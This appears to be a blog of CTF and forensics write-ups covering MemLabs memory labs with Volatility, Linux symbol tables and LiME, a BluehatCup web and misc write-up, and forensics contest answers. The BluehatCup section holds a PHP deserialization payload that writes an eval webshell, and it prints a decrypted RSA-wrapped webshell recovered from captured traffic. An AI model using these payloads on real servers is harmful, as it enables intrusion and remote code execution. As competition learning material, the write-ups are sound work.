The Second Diary of Forensic

MemLabs Lab_2 | A New World

Challenge description

One of the clients of our company, lost the access to his system due to an unknown error. He is supposedly a very popular "environmental" activist. As a part of the investigation, he told us that his go to applications are browsers, his password managers etc. We hope that you can dig into this memory dump and find his important stuff and give it back to us.

Note : This challenge is composed of 3 flags.

我们公司的一位客户由于未知错误而失去了对其系统的访问权限。据推测，他是一位非常受欢迎的“环保”主义者。作为调查的一部分，他告诉我们他的应用程序是浏览器、他的密码管理器等。我们希望你能深入这个内存转储并找到他的重要资料并将其还给我们。

注意：这个挑战由3个flag组成

Progress

Flag 1

老规矩：

根据题目描述，查看进程，重点查看浏览器和密码管理相关进程：

此外，上面还提到了环境变量，envars查看一下：

啊！这串熟悉的base64开头

flag{w3lc0m3T0$T4g3_!_Of_L4B_2}

Flag 2

回到浏览器，提取浏览器历史记录，volatility是不自带这个插件的

https://github.com/superponible/volatility-plugins

(255条消息) volatility2各类外部插件使用简介_Blus.King的博客-CSDN博客_volatility插件

注意： --plugins后写清插件位置，比如这样：

┌──(root㉿SanDieg0)-[/mnt/d/volatility-master]
└─# python2 vol.py  --plugins=./volatility/plugins/ -f "/mnt/f/Memlabs/lab2/Lab2.raw" --profile=Win7SP1x64 chromehistory

发现了一个下载链接，

上个实验第三部分flag：flag{w3ll_3rd_stage_was_easy}

flag{oK_So_Now_St4g3_3_is_DoNE!!}

Flag 3

还有一个密码管理器进程KeePass.exe没有用到

KeePass会存储密码在以.kdbx为后缀的数据库中，并用主密码（master password）进行管理

filescan并进行筛选：

将Hidden.kdbx转储出来后，找密码，文件里面有一张叫Password.png的图片

密码右下角：P4SSw0rd_123

有了密码后，在KeePass里面打开这个数据库：

右键直接复制出来密码：flag{w0w_th1s_1s_Th3_SeC0nDST4g3!!}

（咦？这个才是第二个flag吗？没事，我懒得改了：）

MemLabs Lab 3 | The Evil's Den

下载链接：MemLabs Lab 3

Challenge Descryption

A malicious script encrypted a very secret piece of information I had on my system. Can you recover the information for me please?

Note-1 : This challenge is composed of only 1 flag. The flag split into 2 parts.

Note-2 : You'll need the first half of the flag to get the second.

You will need this additional tool to solve the challenge,

sudo apt install steghide

The flag format for this lab is: inctf{s0me_l33t_Str1ng}

恶意脚本加密了我系统上的一条非常机密的信息。你能为我恢复信息吗？

注意-1：本次挑战只有一个flag，但被分为两个部分。

注意-2：你需要得到第一部分的flag才能得到第二部分flag。

Progress

The first part of the flag

老样子：

题目描述说有恶意脚本，看一下cmd的记录：

确实有一个叫恶意脚本的py脚本🤔还有一个vip.txt

evilscript.py.py：

import sys
import string

def xor(s):

    a = ''.join(chr(ord(i)^3) for i in s)
    return a

def encoder(x):

    return x.encode("base64")

if __name__ == "__main__":

    f = open("C:\\Users\\hello\\Desktop\\vip.txt", "w")

    arr = sys.argv[1]

    arr = encoder(xor(arr))

    f.write(arr)

    f.close()

vip.txt：

呃。。。

看一下脚本过程比较简单，先用一个字符将vip.txt的内容进行异或，然后base64加密一遍，解密也很简单，把过程逆过来就好：

s = 'am1gd2V4M20wXGs3b2U='
d = s.decode('base64')
a = ''.join(chr(ord(i)^3) for i in d)

print a

执行结果：inctf{0n3_h4lf，这是第一部分

The second part of the flag

按照题目描述，还会用到steghide，扫一下图片文件：

.jpg都是些临时文件，.jpeg这个可能性最大，而且名字就很可疑🤔导出来看看：

上面说，有了第一部分的flag才能获取到第二部分，那提示很明显了，密码应该就是第一部分flag

_1s_n0t_3n0ugh}

综上，flag为：inctf{0n3_h4lf_1s_n0t_3n0ugh}

The First Diary of Forensic

用取证软件去做题也能叫取证？懂不懂volatility的含金量啊？
自己到现在还没认真用过Vol，打算刷刷题然后系统学习一下。
（毕竟不能总是指望着用取证大师之类的吧🤔）

MemLabs Lab_0 | Never Too Late Mister

下载链接：Lab0

Challenge Description

My friend John is an "environmental" activist and a humanitarian. He hated the ideology of Thanos from the Avengers: Infinity War. He sucks at programming. He used too many variables while writing any program. One day, John gave me a memory dump and asked me to find out what he was doing while he took the dump. Can you figure it out for me?

我的朋友约翰是一位“环保”活动家和人道主义者。他讨厌复仇者联盟中灭霸的观点：无限战争。他编程很烂。他在编写任何程序时使用了太多变量。有一天，约翰给了我一个内存转储，并让我找出他在转储时在做什么。你能帮我弄清楚吗？

Progress

整体下来就是一个常规取证思路，先imageinfo看一下：

Vol3给出的建议是Win7SP1X86_23418，查看一下进程信息：

看到有运行过cmd.exe，查看一下历史命令行信息：

有一个可疑文件，用cmd调用python.exe，这个地方可以用MARKDOWN_HASH113422dfd86463d669e94c07cf61e0dcMARKDOWNHASH插件，来查看执行的命令行历史记录（扫描CONSOLE_INFORMATION信息）

得到一串字符串335d366f5d6031767631707f

看上去是一段乱码：3]6o]`1vv1p.

如果不解密字符串的话，下一步也不知道干什么。

此时结合上面题目描述"environmental" activist环保主义者提示，应该是要查看环境变量

envars查看一下发现太多了。。。果然是个很差的技术员，在编写程序时使用了太多环境变量

不过后面有提到Thanos，尝试在环境变量里面搜一下

发现真的有，环境变量指向xor and password

先提取password

后面这串查不到啊艹，看了WP人家是查到了。。。。。。

这是第一部分：flag{you_are_good_but

剩下一部分，来处理提示中的xor，目标字符串应该是前面hex解密出的乱码

不过不清楚异或字符是啥，只能爆破了

a = "335d366f5d6031767631707f".decode("hex")
for i in range(0,255):
    b = ""
    for j in a:
        b = b + chr(ord(j) ^ i)
    print b

flag{you_are_good_but1_4m_b3tt3r}

MemLabs Lab_1 | Beginner's Luck

下载链接：Lab1

Challenge description

My sister's computer crashed. We were very fortunate to recover this memory dump. Your job is get all her important files from the system. From what we remember, we suddenly saw a black window pop up with some thing being executed. When the crash happened, she was trying to draw something. Thats all we remember from the time of crash.

Note : This challenge is composed of 3 flags.

我姐姐的电脑坏了。我们非常幸运地恢复了这个内存转储。你的工作是从系统中获取她所有的重要文件。根据我们的记忆，我们突然看到一个黑色的窗口弹出，上面有一些正在执行的东西。崩溃发生时，她正试图画一些东西。这就是电脑崩溃时我们所记得的一切。

注意：此挑战由 3 个flag组成。

Progress

Flag 1

既然有提到突然看到黑色窗口弹出，在执行一些东西，（看描述像是cmd命令行）那么我们用pslist查看一下：

确实是有cmd.exe这个进程，consoles查看命令行输出结果：

很熟悉的base64，

flag{th1s_1s_th3_1st_st4g3!!}

Flag 2

When the crash happened, she was trying to draw something.

在画画，看一下进程列表：

看名称，这个进程和画画有关，PID是2424

修改文件名后缀为data，导入GIMP

调整一下偏移量和宽高，

翻转一下就是flag

flag{Good_Boy_good_girl}

Flag 3

后来才知道，这个地方看的是WinRAR.exe进程，

看一下WinRAR.exe进程历史

看到了一个RAR压缩包：Important.rar

根据地址提取出来：

检测是rar文件类型。修改文件名解压发现需要密码：

hashdump提取

┌──(root㉿SanDieg0)-[/mnt/d/volatility_2.6_win64_standalone]
└─# ./volatility.exe -f "F:\Memlabs\lab1\Lab1.raw" --profile=Win7SP1x64 hashdump
Volatility Foundation Volatility Framework 2.6
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
SmartNet:1001:aad3b435b51404eeaad3b435b51404ee:4943abb39473a6f32c11301f4987e7e0:::
HomeGroupUser$:1002:aad3b435b51404eeaad3b435b51404ee:f0fc3d257814e08fea06e63c5762ebd5:::
Alissa Simpson:1003:aad3b435b51404eeaad3b435b51404ee:f4ff64c8baac57d22f22edc681055ba6:::

hashdump提取有两个HASH，第一个是使用LANMAN算法，这种散列值非常不安全，在Vista以来的Windows系统已经不再采用LANMAN HASH。因此这个hash前会提供一个aad开头的虚拟值。

第二个HASH是我们常说的NTLM HASH，也好不到哪去。

这个地方要解密NTLM，看用户名我盲猜是最后一个f4ff64c8baac57d22f22edc681055ba6：

拿解密到的字符串怎么试都不对，结果发现，不用解密，换成大写。。。（无语住了）

flag{w3ll_3rd_stage_was_easy}

Sekai CTF | Linux Newly version of Kernel Memory Forensics

好久没更新了，水一篇Forensic

      \                             SORRY                         /
         \                                                     /
          \                     This page does                /
           ]                    not exist yet.               [    ,'|
           ]                                                 [   /  |
           ]___                                           ___[ ,'   |
           ]  ]\                                         /[  [ |:   |
           ]  ] \                                       / [  [ |:   |
           ]  ]  ]                                     [  [  [ |:   |
           ]  ]  ]__                                 __[  [  [ |:   |
           ]  ]  ] ]\                ___            /[ [  [  [ |:   |
           ]  ]  ] ]               (((#)))           [ [  [  [ :===='
           ]  ]  ]_]                .nHn.              [_[  [  [
           ]  ]  ]                  HHHHH.            [  [  [
           ]  ] /                   `HH("N             \ [  [
           ]__]/                     HHH  "             \[__[
           ]                         NNN                    [
           ]                         N/"                    [
           ]                         N H                    [
          /                          N                       \
         /                           q,                       \
        /                                                      \

The difference between Volatility2 and Volatility3

Volatility2 下的 profile 制作过程就不写了，主要学习下提一句，非常建议用CentOS 7来制作相应文件，不然在其他 Linux 系统（例如Ubuntu），解决软件依赖性得修好长时间（哭~~）

Volatility2：https://www.jianshu.com/p/7288ac54cd5c

Profile

Profile是特定操作系统版本以及硬件体系结构（x86、x64、ARM）中VTypes、共用体、对象类型的集合。

Vtypes 是 Volatility 框架中数据结构定义以及解析的语言，大部分操作系统底层都是使用 C 语言编写的，其中大量使用数据结构来组织和管理相关的变量以及属性。

因为 Volatility 是用 Python 语言编写的，所以我们需要一种方式在Python 源文件中表示 C 语言的数据结构。

VTypes 正是用于实现这一点的。

除了这些组件以外，Profile 还包括如下:

元数据：操作系统的名称(例如:“windows”,“mac”,“linux”)，内核版本，以及编译号。
系统调用信息：索引以及系统调用的名称。
常量值：全局变量-在某些操作系统中能够在硬编码的地址处找到的全局变量
系统映射：关键全局变量和函数的地址（仅限 Linux 和 Mac）

但在 Volatility3 中，不再使用配置文件Profile，取而代之，vol3自身带有一个扩展的符号表库Symbols，并且对于大多数Windows内存镜像，可以基于内存映像本身来生成新的符号表。它允许符号表包含基于该操作系统位置（符号位置）的特定偏移量。这意味着通过官方调试信息提供的那些结构的已知偏移量，可以更轻松、更快速地识别操作系统中的结构。

Symbol Tables

用于分析相关操作系统数据的内核符号表压缩包，其所有文件以JSON数据格式存储，可以是纯json文件.json，也可以是.json.gz或者.json.xz，Volatility3在使用它们时会自动解压。此外，Vol3会在用户主目录下的.cache/volatility3目录下会缓存他们的压缩内容，当前还无法更改这个缓存目录。

Vol3的symbol tables分为两类，上面的Windows Symbol tables作为一类，由于对Mac和Linux采用相同的识别机制，统分为另外一类。

Windows

对于WIndows系统，符号表字符串由所需PDB文件的GUID和Age组成，Volatility会搜索windows子目录下配置的所有文件，并与包含pdb名称，GUID/Age（或者其他压缩形式）的所有元数据进行匹配、利用。如果找不到的话，会从 Microsoft 官方的符号表服务器下载相关的PDB文件，并自动转化成适当的JSON格式，并存储在合适的位置。

可以从适当的 PDB 文件手动构建 Windows 符号表，而执行此操作的主要工具已经内置在 Volatility3了：pdbconv.py。该文件支持从Volatility3的根路径运行，命令如下：

┌──(kali㉿kali)-[~]
└─$ python3 ./volatility3/framework/symbols/windows/pdbconv.py

Volatility官方也已经给出了Windows符号表：Volatility3官方：Windows符号表下载

Linux/Mac

Volatility3官方：Mac符号表下载

对于 Mac，它只有特定数量的内核，但我们不会经常更新包，因为它有点耗时。

Volitility3官方：Linux符号表（不全）

dwarf2json 可以从 DWARF文件生成 Linux 和 Mac 符号表。而当前，利用内核中包含的调试符号表，是大多数Volatility3插件恢复信息的唯一合适方法。

值得注意的是，只有 -- elf的方案在 vol3 中可行,其他使用如 Sysmap 解析出来的 json 都是不可行的.。(在vol2中生成profile会用到 Sysmap )

./dwarf2json linux --elf /usr/lib/debug/boot/vmlinux-4.4.0-137-generic > output.json

此外，为什么上面说Linux符号表信息不全呢？因为Linux内核易于编译且唯一，无法区分它们，因此官方提供的Linux符号表并不详尽，因此在面对Linux内存取证时，要自行生成符号表；并且，标准内核是被剥离了调试信息的，若想获取带有调试信息的，则需从文件中单独获取。

LiME：Linux Memory Extractor

LiME是Linux可加载内核模块（LKM）Linux的内存提取器，它允许从Linux或者基于Linux的设备（如：Android）获取临时性内存（RAM）。LiME成为第一个允许在Android设备上捕获完整内存的工具，并且最大限度地减少了在获取过程中用户和内核空间进程之间的交互，因此LiME能生成比其他工具更可靠的内存捕获。

基于LiME工具的Android手机动态内存提取

CentOS 5.5编译LiME

编译LiME

[root@localhost CentOS]# tar -zxvf LiME.tar.gz
[root@localhost CentOS]# cd /home/yunwei/Desktop/malware/LiME/src/
[root@localhost src]# make
make -C /lib/modules/2.6.18-194.el5/build M="/home/yunwei/Desktop/malware/LiME/src" modules
make[1]: Entering directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
  Building modules, stage 2.
  MODPOST
  LD [M]  /home/yunwei/Desktop/malware/LiME/src/lime.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
strip --strip-unneeded lime.ko
mv lime.ko lime-2.6.18-194.el5.ko
[root@localhost src]# ll
total 1176
-rw-r--r-- 1 root root   2557 Sep 28  2017 disk.c
-rw-r--r-- 1 root root 168240 May 20 10:44 disk.o
-rw-r--r-- 1 root root  41984 May 20 11:46 lime-2.6.18-194.el5.ko
-rw-r--r-- 1 root root   1920 Sep 28  2017 lime.h
-rw-r--r-- 1 root root   1151 May 20 10:44 lime.mod.c
-rw-r--r-- 1 root root  81632 May 20 10:44 lime.mod.o
-rw-r--r-- 1 root root 505173 May 20 10:44 lime.o
-rw-r--r-- 1 root root   6614 Sep 28  2017 main.c
-rw-r--r-- 1 root root 175408 May 20 10:44 main.o
-rw-r--r-- 1 root root   1661 Sep 28  2017 Makefile
-rw-r--r-- 1 root root   1722 Sep 28  2017 Makefile.sample
-rw-r--r-- 1 root root      0 May 20 10:44 Module.markers
-rw-r--r-- 1 root root      0 May 20 10:44 Module.symvers
-rw-r--r-- 1 root root   3889 Sep 28  2017 tcp.c
-rw-r--r-- 1 root root 166152 May 20 10:44 tcp.o

抓取内存

/home/centos/Desktop/forensic/centos5.lime为自定义路径

## 进入内核模式抓取内存
[root@localhost src]# insmod lime-uname -r.ko path=/home/yunwei/Desktop/malware/centos5.lime format=lime
## 再次抓取内存前要先运行以下命令退出内核模式
[root@localhost src]# rmmod lime

制作元数据

`dwarf2dump`使用

安装调试文件导出工具dwarfdump：

下载与编译libdwarf

## 解压Libdwarf
[root@localhost src]# git clone https://github.com/tomhughes/libdwarf.git
[root@localhost src]# tar -zxvf libdwarf.tar.gz

## 光盘安装依赖包
[root@localhost src]# cd /media/CentOS_5.5_Final/CentOS/
[root@localhost src]# rpm -ivh /media/CentOS_5.5_Final/CentOS/elfutils-libelf-0.137-3.el5.x86_64.rpm 
[root@localhost libdwarf]# rpm -ivh elfutils-libelf-devel-static-0.137-3.el5.x86_64.rpm elfutils-libelf-devel-0.137-3.el5.x86_64.rpm elfutils-libelf-0.137-3.el5.x86_64.rpm

## 编译安装 libdwarf
[root@localhost CentOS]# cd /home/yunwei/Desktop/malware/libdwarf
[root@localhost CentOS]# ./configure
[root@localhost libdwarf]# make

### 若没有报错，则表示安装正确。
[root@localhost libdwarf]# cd dwarfdump/
[root@localhost dwarfdump]# make install
cp dwarfdump /usr/local/bin/dwarfdump
cp ./dwarfdump.conf /usr/local/lib/dwarfdump.conf
cp ./dwarfdump.1 /usr/local/share/man/man1/dwarfdump.1
[root@localhost dwarfdump]# dwarfdump -h
### 输入dwarfdump -h若没有报错，则表示安装正确。

生成内存镜像

[root@localhost malware]# tar -zxvf volatility.tar.gz
[root@localhost malware]# cd volatility/tools/linux/
## 错误
[root@localhost linux]# make
make -C //lib/modules/2.6.18-194.el5/build CONFIG_DEBUG_INFO=y M="/home/yunwei/Desktop/malware/volatility/tools/linux" modules
make[1]: Entering directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
  CC [M]  /home/yunwei/Desktop/malware/volatility/tools/linux/module.o
/home/yunwei/Desktop/malware/volatility/tools/linux/module.c:214: error: redefinition of ‘struct module_sect_attr’
/home/yunwei/Desktop/malware/volatility/tools/linux/module.c:221: error: redefinition of ‘struct module_sect_attrs’
/home/yunwei/Desktop/malware/volatility/tools/linux/module.c:375:5: warning: "STATS" is not defined
/home/yunwei/Desktop/malware/volatility/tools/linux/module.c:391:5: warning: "DEBUG" is not defined
make[2]: *** [/home/yunwei/Desktop/malware/volatility/tools/linux/module.o] Error 1
make[1]: *** [_module_/home/yunwei/Desktop/malware/volatility/tools/linux] Error 2
make[1]: Leaving directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
make: *** [dwarf] Error 2

### 注释掉 198,7 ~ 221,7,编译问题就解决了
/*
#if LINUX_VERSION_CODE == KERNEL_VERSION(2,6,18)
....
struct module_sections module_sect_attrs;

#endif
*/

## 注释代码之后，编译输出状态

[root@localhost linux]# make
make -C //lib/modules/2.6.18-194.el5/build CONFIG_DEBUG_INFO=y M="/home/yunwei/Desktop/malware/volatility-2.6/tools/linux" modules
make[1]: Entering directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
  CC [M]  /home/yunwei/Desktop/malware/volatility-2.6/tools/linux/module.o
/home/yunwei/Desktop/malware/volatility-2.6/tools/linux/module.c:354:5: warning: "STATS" is not defined
/home/yunwei/Desktop/malware/volatility-2.6/tools/linux/module.c:370:5: warning: "DEBUG" is not defined
  Building modules, stage 2.
  MODPOST
  CC      /home/yunwei/Desktop/malware/volatility-2.6/tools/linux/module.mod.o
  LD [M]  /home/yunwei/Desktop/malware/volatility-2.6/tools/linux/module.ko
make[1]: Leaving directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
dwarfdump -di module.ko > module.dwarf
make -C //lib/modules/2.6.18-194.el5/build M="/home/yunwei/Desktop/malware/volatility-2.6/tools/linux" clean
make[1]: Entering directory `/usr/src/kernels/2.6.18-194.el5-x86_64'
  CLEAN   /home/yunwei/Desktop/malware/volatility-2.6/tools/linux/.tmp_versions
make[1]: Leaving directory `/usr/src/kernels/2.6.18-194.el5-x86_64'

Construct the new kernel ISF JSON file

https://beguier.eu/nicolas/articles/security-tips-3-volatility-linux-profiles.html

先运行Volatility3 的banners插件，以确定必要的内核版本。

[root@172 volatility3]$ python3 vol.py -f /home/ad/lmg/memdump/dump.mem banners.Banners
Volatility 3 Framework 2.4.0
Progress:  100.00       PDB scanning finished            
Offset  Banner

0x42400200  Linux version 5.15.0-43-generic (buildd@lcy02-amd64-076) (gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 (Ubuntu 5.15.0-43.46-generic 5.15.39)
0x437c3718  Linux version 5.15.0-43-generic (buildd@lcy02-amd64-076) (gcc (Ubuntu 11.2.0-19ubuntu1) 11.2.0, GNU ld (GNU Binutils for Ubuntu) 2.38) #46-Ubuntu SMP Tue Jul 12 10:30:17 UTC 2022 (Ubuntu 5.15.0-43.46-generic 5.15.39)9)

注意：banners.Banners插件只能识别 Linux 镜像的banner信息，不识别 Windows。

然后我们需要符号表（symbol tables）。根据上面写的dwarf2json生成 json 的命令，是需要我们提供 /usr/lib/debug/boot目录下的vmlinux文件，但是系统往往不会自带该文件，然后发现在/boot目录下有一个相同名字的 vmlinux 文件，但是并不可用。

方案一：apt 安装 vmlinux

⚠：本方案需在指定容器中提供至少 20G 容器空间

大多数情况下，我们会采用apt添加源之后安装的方法。

导入GPG key（此处直接使用网络提供的），在许多 vmlinux 的帖文中, 很少提及该步骤，或者对不同版本的GPG Key 导入没有明确说明。

Ubuntu 16.04 & higher：

jsudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys C8CAB6595FDFF622

Older distributions：

sudo apt-key adv --keyserver keyserver.ubuntu.com --recv-keys ECDCAD72428D7C01

添加源

echo "deb http://ddebs.ubuntu.com $(lsb_release -cs) main restricted universe multiverse" | sudo tee -a /etc/apt/sources.list.d/ddebs.list
echo "deb http://ddebs.ubuntu.com $(lsb_release -cs)-updates main restricted universe multiverse" | sudo tee -a /etc/apt/sources.list.d/ddebs.list
echo "deb http://ddebs.ubuntu.com $(lsb_release -cs)-proposed main restricted universe multiverse" | sudo tee -a /etc/apt/sources.list.d/ddebs.list

apt-get update
apt-get upgrade

安装指定的debugging system ，可以把 uname -r 换成指定的版本（比如banners提到的5.15.0-43-generic，但是需要系统是可以解析的
```
apt-get install linux-image-$(uname -r)-dbgsym
```

方案二：直接获取`dbgsym`文件安装在指定系统

⚠：本方案需在指定容器中提供至少 5G 内存空间

获取源文件网址：https://launchpad.net/ubuntu/+source/linux ，按需选择下载。

[root@172 home]$ git clone https://github.com/volatilityfoundation/dwarf2json
[root@172 home]$ cd dwarf2json
[root@172 dwarf2json]$ go build
[root@172 dwarf2json]$ wget https://launchpad.net/ubuntu/+archive/primary/+files/linux-image-unsigned-5.15.0-48-generic-dbgsym_5.15.0-48.54_amd64.ddeb
[root@172 dwarf2json]$ cd ../
[root@172 home]$ docker run -it --rm -v $PWD:/volatility ubuntu:20.04 /bin/bash
[root@docker]$ cd volatility
[root@docker /volatility]$ dpkg -i linux-image-unsigned-5.15.0-48-generic-dbgsym_5.15.0-48.54_amd64.ddeb
[root@docker /volatility]$ cd ../dwarf2json
[root@docker /dwarf2json]$ ./dwarf2json linux --elf /usr/lib/debug/boot/vmlinux-5.15.0-48-generic > linux-image-5.15.0-48-generic.json 
[root@172 /dwarf2json]$ $ cp linux-image-4.15.0-184-generic.json ./volatility3/volatility3/framework/symbols/linux

vol3的符号表编译完成，然后再解析内存镜像就好了

2022 BluehatCup Semi-Finals | Partly Writeup

Web

easyfatfree

扫出www.zip

直接审

跟$this->write()

跟\Base::instance()

直接就能写马

<?php

namespace DB {

    class Jig {
        public $dir;
        public $data;
        public $lazy;
        public $format;
    }
}

namespace {

    $jig = new DB\Jig();
    $jig->lazy = True;
    $jig->dir = '/var/www/html/';
    $jig->data = ["shell.php" =>['<?php eval($_POST[a]); ?>']];
    $jig->format = 0;
    echo serialize($jig);
}

根目录不能写，换/ui/

有disable_function

用蚁剑bypass

onelinephp

非预期：

同之前国赛的一个题，flag放在了/etc/profile.d/pouchenv.sh和/etc/instanceInfo

直接cat

预期解：

Misc

神秘的日志

看system日志，找到第一次使用ntlm的时间

再从security日志中找到对应时间的登录日志，找最早的那个

右键复制成文本才能看到TimeCreated SystemTime

<TimeCreated SystemTime="2022-04-17T03:27:06.7108313Z" />

flag{dafd0428f634aefd1ddb26f8257c791f}

加密的通道

从http协议分析，可以找到如下代码

解码后可以看到上传了个rsa.php

但是rsa.php是被加密后的

phpjiami 数种解密方法 | 离别歌 (leavesongs.com)

这里采用手工dump法

源码如下：

?><?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
}
}
eval($cmd);

接下来流量重放即可

修改下代码，在本地起php环境

<?php @eval("//Encode by  phpjiami.com,Free user."); ?><?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
  if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
    $cmd .= $de;
  }
}
foreach($_POST as $k => $v){
  if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
     $_POST[$k]=$de;
     echo $k.":::";
     var_dump($_POST[$k]);
}
}
var_dump($cmd);
// eval($cmd);

最后一条流量显示出有flag.txt，于是看倒数第二条流量

重放解密

substr($_POST["k85c8f24ca50da"], 2)进行base64解码就是flag

取证

手机取证_1

手机取证_2

exe_1

导入微步云沙箱

exe_2

导入微步云沙箱

exe_3

导入微步云沙箱

exe_4

挖矿

exe_5

导入微步云沙箱

apk2

apk3

apk反编译发现loadUrl

apk5

反编译apk文件

apk7

MainActivity有几个分支代表有几个页面。

apk8

红星.ipa导出，解压，\123123123123213\Payload\0B5A51EA-18C7-4B3F-B1EF-1D48955CD71F\红星.app

apk12

apk13

安装软件，默认6661

apk15

第七届中国电子数据取证大赛 | 团体赛

[填空题] 工地职员 A 计算机的修复密钥标识符是什么？(请以大写英文及阿拉伯数字输
入答案，不要输入”-“) (1 分)

打开取证大师，找到 bitlocker 解密选项，对该分区解密的位置自动跳出恢复
密钥标记
[填空题] 工地职员 A 计算机的修复密钥解除锁定是什么？(请以数字输入答案，不要输
入”-“) (1 分)

搜索 bitlocker，找到和密钥标识符一样的密钥快捷方式。跳转到该文件，并导出查看属性，但是并没有找到解密路径，怀疑密钥文件在别的镜像里，想到个人赛镜像的 bitlocker
密钥就是在 FTP 服务器中找到的。再次搜索 bitlocker，找到密钥文件。
[单选题] 工地职员 A 的计算机被什么程式加密？ (1 分)
A. Ransomware
B. BitLocker
C. AxCrypt
D. PGP
E. FileVault 2

前面问到了，B
[单选题] 工地职员 A 的孩子有可能正准备就读什么学校？ (2 分)
A. 小学
B. 中学
C. 幼儿园
D. 大学

看浏览器浏览记录发现搜索幼儿园的记录，应该就是在上幼儿园。
[多选题] 工地职员 A 并没有打开过哪一个档案？ (2 分)
A. Staff3.xlsx
B. Staff4.xlsx
C. Staff1.xlsx
D. Staff2.xlsx
E. BTC address.bmp
[填空题] 工地职员 A 的计算机被远程控制了多少分钟？(请以阿拉伯数字回答) (2 分)

算一下11min16s
[单选题] 工地职员 A 的计算机被加密后，被要求存入的虚疑货币是什么？ (1 分)
A. 比特币现金
B. 比特币
C. 以太币
D. 泰达币
[填空题] 在工地职员 A 的计算机曾经打开过的 Excel 档案中，有多少人有可能在法律部
门工作？(请以阿拉伯数字回答) (1 分)

在staff1.xlsx
[多选题] 工地职员 B 的计算机在什么日期和时间被黑客控制？ (2 分)
A. 2021-10-19
B. 2021-09-16
C. 11:16:41 (UTC +8:00)
D. 05:55:50 (UTC +8:00)
E. 18:40:06 (UTC +8:00)

看题，日期的话有两个，对比两个日期结果在windows历史活动日志里面最早是10-05，所以更大的可能是10-19，在10-19只有一个记录，是11:26，与11:16最接近，可能是有错吧。
[填空题] 工地职员 B 的计算机的MAC Address 是什么? (请以大写英文及数字输入答
案) (1 分)
[填空题] 工地职员 B 的计算机用户 FaFa 的 Profile ID 是什么？(请以大写英文及数
字输入答案，不要输入”-“) (1 分)

应该就是这个地方的SID
[填空题] 工地职员 B 的办公室计算机的 Windows CD Key 是什么？(请以大写英文
及数字输入答案，不要输入”-“) (1 分)

方法二：计算机仿真进去后，使用 ProduKey 工具，对其进行自动化获取
[单选题] 检查过工地职员 B 的计算机登录档后(Window Registry)，计算机感染了什
么恶意软件？ (2 分)
A. Adware
B. Worms
C. Rootkits
D. 没有感染任何恶意软件

仿真起来后，把杀毒软件装上，全盘扫一下，没有恶意软件。
[单选题] 工地职员 B 的计算机中被加密硬盘内的图片”_120778782_58759559.jpg”，
有可能是从下列哪个的途径载入计算机？ (1 分)

网上下载
[多选题] 工地职员 B 的计算机中被加密硬盘内的图片中，人物中衣着有什么颜色？
(2 分)

直接访问看看
[填空题] 工地职员 B 的计算机有多少个磁盘分区？(请以阿拉伯数字输入答案) (1 分)
[填空题] 工地职员 B 的计算机硬盘分割表是什么？(答案请以首字母大写作答) (2 分)
[填空题] 在工地职员 B 的计算机 Event Log 中最后登入时 services.exe 的 Process
ID 是什么？(请以阿拉伯数字输入) (3 分)

工地职工 B 最后登入时，查看这个时间点是 2021 年 10 月 19 日 11:26:07，找这
个时间点附近的日志。讲事件
使用取证大师搜索 services.exe 找到其日志，导出来分析一下，取证大师自动解析的我个
人觉得不是很好看。导出后发现在晚于这个时间点，也有登录日志，用日期来排序，找到
最后一个登录的日志。找到登录时间节点在 18:39:58 是最后一次登录，从日志分析出
services.exe 的 pid 号是 16 进制的 0x27c，用计算器转成 10 进制为 636。
[填空题] 甚么 IP 曾经上传档案到网页服务器? (请以阿拉伯数字回答，不用输入”.“) (2
分)

不得不说，取证大师的优点就是比火眼在文件处理与磁盘分区上更清晰一点
[多选题] 承上题，以下哪试档案曾被上传到网页服务器? (3 分)
[单选题] 入侵者可能使用甚么漏洞进行入侵网页服务器? (1 分)
A. 文件上传漏洞
B. SQL 注入
C. 跨站脚本攻击
D. 格式化字符串弱点
送分题目，根据前两道题得出，是渗透知识常识题。
[多选题] 在网页服务器找到的所有文件档(doc 及 docx)中，有以下哪些文件制作人
(Author)? (2 分)
A. Kevin L. Brown
B. Peter R. Lee
C. Mary
D. May
E. Colin
